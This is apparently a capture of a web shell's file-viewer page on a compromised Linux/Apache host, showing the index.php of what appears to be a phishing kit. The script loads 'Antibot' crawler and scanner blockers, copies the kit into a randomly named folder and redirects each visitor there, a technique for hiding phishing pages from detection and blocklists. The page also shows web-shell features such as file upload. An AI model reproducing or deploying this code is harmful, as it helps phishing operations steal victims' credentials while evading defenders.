HEX
Server: Apache
System: Linux host.dominioscaracas.com 4.18.0-477.15.1.lve.2.el8.x86_64 #1 SMP Wed Aug 2 10:43:45 UTC 2023 x86_64
User: enciassa (1159)
PHP: 8.1.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/enciassa/lh/index.php
<?php
include('_+_==/Antibot/blockers.php');
include('_+_==/Antibot/detects.php');
include('_+_==/Antibot/new.php');
include('_+_==/Antibot/Bot-Crawler.php');
include('_+_==/Antibot/Dila_DZ.php');

include('blocker.php');
$random = rand(0,100000000000);
$dst    = substr(md5($random), 0, 1000000000);

//+++++++++++++++++// CREATE FOLDER AND COPY FILE \\+++++++++++++++++\\

function recurse_copy($src,$dst)
{
	$dir = opendir($src);
	@mkdir($dst);
	while(false !== ( $file = readdir($dir)) ) {
		if (( $file != '.' ) && ( $file != '..' )) {
			if ( is_dir($src . '/' . $file) ) {
				recurse_copy($src . '/' . $file,$dst . '/' . $file);
			}
			else {
				copy($src . '/' . $file,$dst . '/' . $file);
			}
		}
	}
	closedir($dir);
}

$src="_+_==";
recurse_copy( $src, $dst );

header("location:".$dst."");

?>